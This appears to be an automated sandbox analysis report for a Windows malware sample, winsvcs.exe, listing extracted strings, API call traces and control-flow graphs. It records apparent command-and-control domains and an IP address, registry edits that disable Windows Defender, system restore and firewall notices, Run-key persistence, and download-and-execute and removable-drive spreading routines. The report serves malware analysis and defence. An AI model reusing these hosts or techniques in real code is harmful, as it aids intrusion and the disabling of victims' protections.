                                                                                                                                                                                                                          • %s%s, xrefs: 00404751
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.su/, xrefs: 004038ED
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Security Center\Svc\, xrefs: 004044B4
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.com/, xrefs: 00403B31
                                                                                                                                                                                                                          • http://eofihsishihiursgu.biz/, xrefs: 00403C35
                                                                                                                                                                                                                          • UpdatesDisableNotify, xrefs: 00403811
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.net/, xrefs: 00403A23
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 004042C9
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.info/, xrefs: 00403CA3
                                                                                                                                                                                                                          • http://fiiauediehduefuge.biz/, xrefs: 00403AEB
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.net/, xrefs: 00403A55
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.ru/, xrefs: 00403861
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.ru/, xrefs: 004038A7
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.net/, xrefs: 00403A19
                                                                                                                                                                                                                          • o.exe, xrefs: 004037B7
                                                                                                                                                                                                                          • Microsoft Windows Services, xrefs: 00403780
                                                                                                                                                                                                                          • DisableBehaviorMonitoring, xrefs: 004043A2
                                                                                                                                                                                                                          • %temp%, xrefs: 004037DF
                                                                                                                                                                                                                          • http://fiiauediehduefuge.su/, xrefs: 00403933
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.ru/, xrefs: 00403843
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.biz/, xrefs: 00403BE5
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.com/, xrefs: 00403B3B
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.biz/, xrefs: 00403AE1
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.biz/, xrefs: 00403AC3
                                                                                                                                                                                                                          • p.exe, xrefs: 004037A3
                                                                                                                                                                                                                          • DisableBehaviorMonitoring, xrefs: 004043CF
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.su/, xrefs: 004038E3
                                                                                                                                                                                                                          • UpdatesOverride, xrefs: 004037F3
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.com/, xrefs: 00403BA9
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.info/, xrefs: 00403C5D
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.com/, xrefs: 00403B1D
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.biz/, xrefs: 00403A91
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.com/, xrefs: 00403B8B
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.biz/, xrefs: 00403BD1
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.su/, xrefs: 00403915
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.info/, xrefs: 00403C71
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.info/, xrefs: 00403CC1
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.ru/, xrefs: 00403893
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.biz/, xrefs: 00403AFF
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.net/, xrefs: 00403A41
                                                                                                                                                                                                                          • %ls:*:Enabled:%s, xrefs: 00403EEF
                                                                                                                                                                                                                          • http://eofihsishihiursgu.su/, xrefs: 00403951
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.in/, xrefs: 0040396F
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.com/, xrefs: 00403B95
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$FileSleep_snwprintf$ExitModuleProcess$AddressCreateDeleteEnvironmentErrorExistsExpandHandleLastMutexNamePathProcStrings
                                                                                                                                                                                                                          • String ID: %appdata%$%ls:*:Enabled:%s$%ls:Zone.Identifier$%ls\%ls$%ls\94000696690303050$%s%s$%temp%$%userprofile%$%windir%$4950050503930$AntiVirusDisableNotify$AntiVirusOverride$AutoUpdateDisableNotify$DisableAntiSpyware$DisableAntiSpyware$DisableBehaviorMonitoring$DisableBehaviorMonitoring$DisableOnAccessProtection$DisableOnAccessProtection$DisableSR$DisableSR$DisableScanOnRealtimeEnable$DisableScanOnRealtimeEnable$FirewallDisableNotify$FirewallOverride$Microsoft Windows Services$SOFTWARE\Microsoft\Security Center\$SOFTWARE\Microsoft\Security Center\Svc\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SOFTWARE\Policies\Microsoft\Windows Defender\$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesOverride$http://92.63.197.48/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.com/$http://afeifieuuufufufuf.in/$http://afeifieuuufufufuf.info/$http://afeifieuuufufufuf.net/$http://afeifieuuufufufuf.ru/$http://afeifieuuufufufuf.su/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.com/$http://aiiaiafrzrueuedur.in/$http://aiiaiafrzrueuedur.info/$http://aiiaiafrzrueuedur.net/$http://aiiaiafrzrueuedur.ru/$http://aiiaiafrzrueuedur.su/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.com/$http://eiifngjfksisiufjf.in/$http://eiifngjfksisiufjf.info/$http://eiifngjfksisiufjf.net/$http://eiifngjfksisiufjf.ru/$http://eiifngjfksisiufjf.su/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.com/$http://eofihsishihiursgu.in/$http://eofihsishihiursgu.info/$http://eofihsishihiursgu.net/$http://eofihsishihiursgu.ru/$http://eofihsishihiursgu.su/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.com/$http://eoroooskfogihisrg.in/$http://eoroooskfogihisrg.info/$http://eoroooskfogihisrg.net/$http://eoroooskfogihisrg.ru/$http://eoroooskfogihisrg.su/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.com/$http://fifiehsueuufidhfi.in/$http://fifiehsueuufidhfi.info/$http://fifiehsueuufidhfi.net/$http://fifiehsueuufidhfi.ru/$http://fifiehsueuufidhfi.su/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.com/$http://fiiauediehduefuge.in/$http://fiiauediehduefuge.info/$http://fiiauediehduefuge.net/$http://fiiauediehduefuge.ru/$http://fiiauediehduefuge.su/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.com/$http://fuaiuebndieufeufu.in/$http://fuaiuebndieufeufu.info/$http://fuaiuebndieufeufu.net/$http://fuaiuebndieufeufu.ru/$http://fuaiuebndieufeufu.su/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.com/$http://iuirshriuisruruuf.in/$http://iuirshriuisruruuf.info/$http://iuirshriuisruruuf.net/$http://iuirshriuisruruuf.ru/$http://iuirshriuisruruuf.su/$http://nnososoosjfeuhueu.biz/$http://nnososoosjfeuhueu.com/$http://nnososoosjfeuhueu.in/$http://nnososoosjfeuhueu.info/$http://nnososoosjfeuhueu.net/$http://nnososoosjfeuhueu.ru/$http://nnososoosjfeuhueu.su/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.com/$http://noeuaoenriusfiruu.in/$http://noeuaoenriusfiruu.info/$http://noeuaoenriusfiruu.net/$http://noeuaoenriusfiruu.ru/$http://noeuaoenriusfiruu.su/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.com/$http://nousiieiffgogogoo.in/$http://nousiieiffgogogoo.info/$http://nousiieiffgogogoo.net/$http://nousiieiffgogogoo.ru/$http://nousiieiffgogogoo.su/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.com/$http://slpsrgpsrhojifdij.in/$http://slpsrgpsrhojifdij.info/$http://slpsrgpsrhojifdij.net/$http://slpsrgpsrhojifdij.ru/$http://slpsrgpsrhojifdij.su/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.com/$http://srndndubsbsifurfd.in/$http://srndndubsbsifurfd.info/$http://srndndubsbsifurfd.net/$http://srndndubsbsifurfd.ru/$http://srndndubsbsifurfd.su/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.com/$http://ssofhoseuegsgrfnj.in/$http://ssofhoseuegsgrfnj.info/$http://ssofhoseuegsgrfnj.net/$http://ssofhoseuegsgrfnj.su/$http://ssofhoseuegsgrfnu.ru/$m.exe$o.exe$p.exe$s.exe$t.exe$winsvcs.exe$x$x
                                                                                                                                                                                                                          • API String ID: 2238563751-1929099517
                                                                                                                                                                                                                          • Opcode ID: f465d73126e8367d1ffc007a02f79c674ac2dcc4ef3619fa4bc65965357681e1
                                                                                                                                                                                                                          • Instruction ID: 998e279ab630b6434e1c0101dc3529ca0b686cab9416bf1021e7191076eb0e73
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f465d73126e8367d1ffc007a02f79c674ac2dcc4ef3619fa4bc65965357681e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43923DB0A407699EEF20DF50DD49BDAB7B4FB04705F0080EAE249BA1D1C7B85A84CF59

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E27
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E3D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E53
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E69
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402E7F
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00402E9F
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00402EB8
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EBE
                                                                                                                                                                                                                          • srand.MSVCRT ref: 00402EC5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402ED9
                                                                                                                                                                                                                          • rand.MSVCRT ref: 00402EE1
                                                                                                                                                                                                                          • rand.MSVCRT ref: 00402EF5
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00402F21
                                                                                                                                                                                                                          • InternetOpenW.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00402F36
                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402F64
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00402F93
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,?,00000207,?), ref: 00402FC5
                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00402FF4
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00403002
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403020
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0040302F
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040303A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00403061
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040306D
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00403079
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00403084
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004030A7
                                                                                                                                                                                                                          • rand.MSVCRT ref: 004030AF
                                                                                                                                                                                                                          • rand.MSVCRT ref: 004030C3
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004030EF
                                                                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040310B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403122
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403142
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00403151
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040315C
                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00403171
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File_snwprintf$CloseHandleInternetrand$Sleep$DeleteOpen$CountCreateDownloadEnvironmentExitExpandImageLoadStringsThreadTickWritesrand
                                                                                                                                                                                                                          • String ID: %hs$%ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
                                                                                                                                                                                                                          • API String ID: 1494052058-3583034578
                                                                                                                                                                                                                          • Opcode ID: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
                                                                                                                                                                                                                          • Instruction ID: 78f194360a85e13182315f20d4f49311ac3511ff64a984fe922711d5a5a3e9c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D88157719803186AEB209B60DC4AFDA777CBF04705F1444B6B749F60D1DA785B84CF99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 459 403db3-403dc7 461 403ed6-403f1a Sleep _snwprintf 459->461 462 403dcd-403e84 memset * 3 ExpandEnvironmentStringsW _snwprintf * 2 PathFileExistsW 459->462 465 403f20-403f39 461->465 463 403e86 462->463 464 403e8a-403e99 PathFileExistsW 462->464 463->461 468 403eaa-403ec2 CopyFileW 464->468 469 403e9b-403ea4 CreateDirectoryW 464->469 466 403f83-403f88 465->466 467 403f3b-403f43 465->467 472 403f8e-403fa1 466->472 470 403f45-403f60 467->470 471 403f7a-403f81 467->471 473 403ec4 468->473 474 403ec6-403ecb Sleep 468->474 469->468 470->466 475 403f62-403f78 470->475 471->472 476 403fa7-403fe5 SetFileAttributesW * 2 RegOpenKeyExW 472->476 477 40413b-404166 Sleep RegOpenKeyExW 472->477 473->461 473->474 475->465 475->471 480 404070-404090 RegOpenKeyExW 476->480 481 403feb-404000 476->481 478 404220-404240 RegOpenKeyExW 477->478 479 40416c-404199 RegQueryValueExW 477->479 484 404246-404271 RegQueryValueExW 478->484 485 4043f8-404418 RegOpenKeyExW 478->485 482 404214-40421a RegCloseKey 479->482 483 40419b-4041b0 479->483 487 404096-4040ab 480->487 488 40411b-404135 call 40206e Sleep ExitProcess 480->488 486 404006-404025 481->486 482->478 490 4041b6-4041d5 483->490 493 404291-4042b1 RegOpenKeyExW 484->493 494 404273-40428b RegSetValueExW 484->494 491 4044a6-4044c6 RegOpenKeyExW 485->491 492 40441e-404425 485->492 486->486 495 404027-40406a RegSetValueExW RegCloseKey 486->495 496 4040b1-4040d0 487->496 490->490 498 4041d7-40420e RegSetValueExW 490->498 502 404554-404574 RegOpenKeyExW 491->502 503 4044cc-4044d3 491->503 499 404434-40443b 492->499 500 4042b3-4042d3 RegCreateKeyExA 493->500 501 4042d9-4042f9 RegOpenKeyExW 493->501 494->493 495->480 496->496 504 4040d2-404115 RegSetValueExW RegCloseKey 496->504 498->482 508 40449a-4044a0 RegCloseKey 499->508 509 40443d-404470 RegQueryValueExW 499->509 500->501 510 4043ec-4043f2 RegCloseKey 501->510 511 4042ff-40432a RegQueryValueExW 501->511 506 404576-4045a1 RegQueryValueExW 502->506 507 4045cd-404602 Sleep CreateThread Sleep call 401fac 502->507 505 4044e2-4044e9 503->505 504->488 512 404548-40454e RegCloseKey 505->512 513 4044eb-40451e RegQueryValueExW 505->513 514 4045c1-4045c7 RegCloseKey 506->514 515 4045a3-4045bb RegSetValueExW 506->515 530 404604-404630 Sleep CreateThread Sleep 507->530 531 40466b-404670 Sleep 507->531 508->491 517 404472-404492 RegSetValueExW 509->517 518 404498 509->518 510->485 519 40434a-404375 RegQueryValueExW 511->519 520 40432c-404344 RegSetValueExW 511->520 512->502 523 404520-404540 RegSetValueExW 513->523 524 404546 513->524 514->507 515->514 517->518 518->499 521 404395-4043c0 RegQueryValueExW 519->521 522 404377-40438f RegSetValueExW 519->522 520->519 527 4043e0-4043e6 RegCloseKey 521->527 528 4043c2-4043da RegSetValueExW 521->528 522->521 523->524 524->505 527->510 528->527 533 40463f-404646 530->533 532 404676-40469b Sleep 531->532 537 4046a1-404707 Sleep memset _snprintf call 401cda Sleep 532->537 538 4047a2 532->538 533->531 534 404648-404669 Sleep call 401cda 533->534 534->533 543 404716-40471d 537->543 538->532 544 40479d 543->544 545 40471f-40477c Sleep memset _snprintf call 401674 543->545 544->538 548 404798 545->548 549 40477e-404792 CreateThread 545->549 548->543 549->548
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DF1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E07
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E46
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E6D
                                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00403E7C
                                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00403E91
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00403EA4
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00403EBA
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00403EDB
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403F00
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000007), ref: 00403FB0
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000007), ref: 00403FBF
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00403FDD
                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040405E
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040406A
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00404088
                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 00404109
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00404115
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040412D
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00404135
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
                                                                                                                                                                                                                          • %ls\94000696690303050, xrefs: 00403E35
                                                                                                                                                                                                                          • %ls:*:Enabled:%s, xrefs: 00403EEF
                                                                                                                                                                                                                          • %ls\%ls, xrefs: 00403E5C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$_snwprintfmemset$AttributesCloseExistsOpenPathSleepValue$CopyCreateDirectoryEnvironmentExitExpandProcessStrings
                                                                                                                                                                                                                          • String ID: %ls:*:Enabled:%s$%ls\%ls$%ls\94000696690303050$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                                                                                                                                                          • API String ID: 2527662941-1033523944
                                                                                                                                                                                                                          • Opcode ID: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
                                                                                                                                                                                                                          • Instruction ID: f988062a3cac2b408eb3252422939997e0dc03c7f21b39b6b4153b48e23d4fb2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98812675A002699EDB20DB54CC49BDAB3B8FB08305F0041EAF649F6191EB749AD4CF99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004035FB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403611
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403627
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040363B
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00403651
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00403668
                                                                                                                                                                                                                          • GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 0040367A
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403680
                                                                                                                                                                                                                          • srand.MSVCRT ref: 00403687
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004036A3
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe,00000000), ref: 004036B9
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe,00000080), ref: 004036CD
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004036F2
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00403711
                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00403734
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$File$DriveStrings$AttributesCopyCountCurrentDirectoryEnvironmentExitExpandLogicalModuleNameThreadTickType_snwprintfsrand
                                                                                                                                                                                                                          • String ID: %ls\Windows Archive Manager.exe$%temp%$C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe
                                                                                                                                                                                                                          • API String ID: 1005768253-3794033333
                                                                                                                                                                                                                          • Opcode ID: b63559b0f90c80b58217091748f155997f69f41dcf91cb22f45ed2a401fd4725
                                                                                                                                                                                                                          • Instruction ID: d69677a716828d0fd0f9714df326e3bc7eebc1e83e94ac9ad288232d9b6456d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b63559b0f90c80b58217091748f155997f69f41dcf91cb22f45ed2a401fd4725
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1318AF1A407086BDB609B60DC4AF9F376CEB00701F1044B6F648F61D2DA789A848F68

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 562 402c41-402c99 memset GetModuleFileNameW Sleep _wfopen 563 402cca-402ccf Sleep 562->563 564 402c9b-402cc9 fseek ftell fclose 562->564 565 402cd5-402d19 memset * 2 GetLogicalDriveStringsW 563->565 564->563 566 402d1c-402d24 565->566 567 402de3-402dee Sleep 566->567 568 402d2a-402d36 GetDriveTypeW 566->568 567->565 569 402da7-402db3 GetDriveTypeW 568->569 570 402d38-402d44 568->570 572 402dd5-402dde 569->572 573 402db5-402dc1 569->573 570->569 571 402d46-402d52 570->571 571->569 575 402d54-402d7d SetErrorMode GetVolumeInformationW 571->575 572->566 573->572 574 402dc3-402dd2 call 402204 573->574 574->572 577 402d95-402da4 call 402204 575->577 578 402d7f-402d93 call 402204 575->578 577->569 578->569
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402C56
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\94000696690303050\winsvcs.exe,00000208), ref: 00402C6A
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00402C75
                                                                                                                                                                                                                          • _wfopen.MSVCRT ref: 00402C85
                                                                                                                                                                                                                          • fseek.MSVCRT ref: 00402CA5
                                                                                                                                                                                                                          • ftell.MSVCRT ref: 00402CB3
                                                                                                                                                                                                                          • fclose.MSVCRT ref: 00402CC4
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00402CCF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE3
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CF9
                                                                                                                                                                                                                          • GetLogicalDriveStringsW.KERNEL32(000000D0,?), ref: 00402D0D
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00402D2D
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00402D56
                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,00000000,00000000,00000000), ref: 00402D75
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00402DAA
